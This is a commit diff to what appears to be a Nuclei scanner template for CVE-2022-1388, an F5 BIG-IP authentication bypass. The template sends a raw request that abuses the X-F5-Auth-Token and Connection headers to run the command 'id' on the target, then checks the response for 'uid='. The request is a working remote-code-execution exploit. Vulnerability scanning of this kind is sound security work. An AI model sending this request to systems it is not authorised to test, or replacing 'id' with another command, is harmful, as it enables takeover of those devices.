Update CVE-2022-1388.yaml
parent
955e67ca1f
commit
2209df5576
|
@ -12,8 +12,13 @@ info:
|
|||
exposure; this is a control plane issue only.
|
||||
reference:
|
||||
- https://support.f5.com/csp/article/K23605346
|
||||
metadata:
|
||||
verified-by: rootup
|
||||
tags: bigip,cve,cve2022,rce,mirai
|
||||
|
||||
variables:
|
||||
auth: "admin:"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -21,16 +26,16 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Connection: keep-alive, X-F5-Auth-Token
|
||||
X-F5-Auth-Token: a
|
||||
Authorization: Basic {{base64(auth)}}
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"command": "run",
|
||||
"utilCmdArgs": "-c id"
|
||||
}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "commandResult"
|
||||
- "uid="
|
||||
condition: and
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue